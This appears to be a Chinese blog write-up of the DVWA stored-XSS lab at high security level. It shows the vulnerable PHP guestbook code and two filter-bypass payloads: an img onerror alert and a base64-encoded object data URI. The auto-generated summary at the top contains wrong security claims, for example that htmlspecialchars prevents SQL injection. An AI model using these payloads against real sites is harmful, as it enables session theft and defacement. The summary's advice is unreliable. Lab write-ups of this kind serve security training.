小编点评

The code you provided is vulnerable to cross-site scripting (XSS) attacks. It allows an attacker to inject malicious code into the database by manipulating the `$name` variable. **XSS Vulnerability:** ```html <img src=1 onerror=alert('Youareattackedbyhacker4!')> ``` * The code inserts an `img` tag with an `onerror` attribute that alerts the user when an attack is detected. * The attacker can set the `src` attribute to a malicious URL or a URL that contains a script that will be executed on the victim's browser. **How to Mitigate XSS Vulnerability:** * Escape any user-supplied input before using it in SQL queries or other operations. * Use parameterized queries to prevent SQL injection attacks. * Validate user input before displaying it on the web page. * Use a HTML sanitizer to escape any malicious HTML tags. **Example Mitigation:** ```php $name = trim( $_POST[ 'txtName' ] ); $name = htmlspecialchars( $name ); $query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );"; $result = mysql_query( $query, $conn ) or die( 'Error: ' . mysql_error() ); ``` In this example, we first trim the user input and then escape it using `htmlspecialchars`. This prevents the SQL injection attack.

正文

XSS Store

hign level

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = mysql_real_escape_string( $message );
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
    $name = mysql_real_escape_string( $name );

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    //mysql_close();
}

?>

payload1:

<img src=1 onerror=alert('Youareattackedbyhacker4!')>

payload2:
ps: 这个会导致博客园产生xss，所以先用>来规避一下

<>object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="><>/object>

PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=为base64编码后的<script>alert('xss')</script>